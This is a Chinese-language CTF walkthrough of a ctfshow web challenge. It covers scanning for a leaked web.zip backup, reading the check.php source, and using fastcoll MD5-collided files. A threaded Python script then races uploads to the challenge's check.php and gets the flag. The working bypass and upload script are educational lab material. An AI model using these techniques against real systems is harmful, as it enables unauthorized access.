提示了不是sql注入,需要找源码。查看网页源代码
<script>
function login(s){
var u=document.getElementById("username").value;
var p=document.getElementById("password").value;
var xhr = new XMLHttpRequest();
xhr.open('GET', "login.php?u="+u+"&p="+p);
xhr.responseType = 'arraybuffer';
xhr.onreadystatechange = function getPdfOnreadystatechange(e) {
if (xhr.readyState === 4) {
if (xhr.status === 200) {
var data = (xhr.mozResponseArrayBuffer || xhr.mozResponse ||
xhr.responseArrayBuffer || xhr.response);
if(data){
ctfshow(s,data);
}
}
}
};
xhr.send(null);
}
function ctfshow(token,data){
var oReq = new XMLHttpRequest();
oReq.open("POST", "check.php?token="+token+"&php://input", true);
oReq.onload = function (oEvent) {
if(oReq.status===200){
var res=eval("("+oReq.response+")");
if(res.success ==1 &&res.error!=1){
alert(res.msg);
return;
}
if(res.error ==1){
alert(res.errormsg);
return;
}
}
return;
};
oReq.send(data);
}
</script>
发现初始化请求的登录信息oReq.open("POST", "check.php?token="+token+"&php://input", true);
先放着,使用目录扫描工具扫描目录看看。
在kali下使用了dirb,可能字典不够强大,没扫出东西来,直接上御剑。扫出了web.zip的目录。
访问下载web.zip,里边是个名为check.php.bak的文件
function receiveStreamFile($receiveFile){
$streamData = isset($GLOBALS['HTTP_RAW_POST_DATA'])? $GLOBALS['HTTP_RAW_POST_DATA'] : '';
if(empty($streamData)){
$streamData = file_get_contents('php://input');
}
if($streamData!=''){
$ret = file_put_contents($receiveFile, $streamData, true);
}else{
$ret = false;
}
return $ret;
}
if(md5(date("i")) === $token){
$receiveFile = 'flag.dat';
receiveStreamFile($receiveFile);
if(md5_file($receiveFile)===md5_file("key.dat")){
if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
$ret['success']="1";
$ret['msg']="人脸识别成功!$flag";
$ret['error']="0";
echo json_encode($ret);
return;
}
$ret['errormsg']="same file";
echo json_encode($ret);
return;
}
$ret['errormsg']="md5 error";
echo json_encode($ret);
return;
}
$ret['errormsg']="token error";
echo json_encode($ret);
return;
发现这里是和key.dat文件进行强碰撞(两个文件的md5值相同,同时sha1值不相同)
key.dat文件直接访问/key.dat进行下载
借助工具:fastcoll_v1.0.0.5.exe生成两个md5值相同的文件。
fastcoll_v1.0.0.5.exe -p key.dat -o 1.dat 2.dat
然后使用上传文件的脚本将1.bat或者2.bat上传碰撞就可以了
import requests
import time
import hashlib
import threading
def post(data):
try:
r=requests.post(url,data=data)
if "ctfshow" in r.text:
print(r.text)
except Exception as e:
pass
mi=str(time.localtime().tm_min)
m=hashlib.md5(mi.encode()).hexdigest()
url='http://b628580c-7c5d-479c-b607-44011837aaea.challenge.ctf.show/check.php?token={}&php://input'.format(m)
with open('key.dat','rb') as f:
data1=f.read()
with open('2.dat','rb') as f:
data2=f.read()
for i in range(30):
threading.Thread(target=post,args=(data1,)).start()
for i in range(30):
threading.Thread(target=post,args=(data2,)).start()
执行脚本得到flag